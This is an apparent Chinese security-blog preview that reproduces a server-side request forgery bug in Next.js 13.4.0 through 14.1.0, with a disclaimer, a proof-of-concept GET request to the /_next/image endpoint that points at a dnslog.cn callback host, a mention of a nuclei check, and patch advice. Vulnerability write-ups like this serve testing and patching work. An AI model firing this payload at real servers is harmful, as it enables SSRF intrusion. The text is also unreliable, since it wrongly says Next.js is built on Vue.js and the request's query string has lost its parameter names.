文章预览
网安引领时代,弥天点亮未来 0x00写在前面 本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责! 0x01漏洞介绍 ZEIT Next.js是ZEIT公司的一款基于Vue.js、Node.js、Webpack和Babel.js的开源Web应用框架。 ZEIT Next.js 13.4版本至14.1.1之前版本存在代码问题漏洞,该漏洞源于存在服务器端请求伪造 (SSRF) 漏洞。 0x02影响版本 13.4.0 < =next < 14.1.1 0x03漏洞复现 1.访问漏洞环境 2.对漏洞进行复现 POC 漏洞复现 GET /_next/image?w=16 =10 =https://itulk9.dnslog.cn HTTP/1.1 Host : 127.0.0.1 User-Agent : Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 测试dnslog漏洞存在。 3. nuclei文件测试(漏洞存在) 0x04修复建议 目前厂商已发布升级补丁以修复漏洞,补丁获取链接: https: //www .npmjs.com/ package / next /v/ 14.1 . 1 -canary. 40 弥
………………………………